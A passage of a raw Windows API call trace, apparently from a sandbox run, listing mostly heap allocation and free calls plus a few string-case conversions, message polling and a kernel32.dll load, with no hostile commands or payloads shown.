| out: hHeap=0x1780000) returned 1 [0125.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0125.637] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0125.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0125.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0125.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0125.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0125.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0125.638] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0125.638] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0125.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0125.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0125.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0125.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0125.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0125.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0125.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0125.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.641] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0125.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.644] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0125.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.647] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0125.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.647] 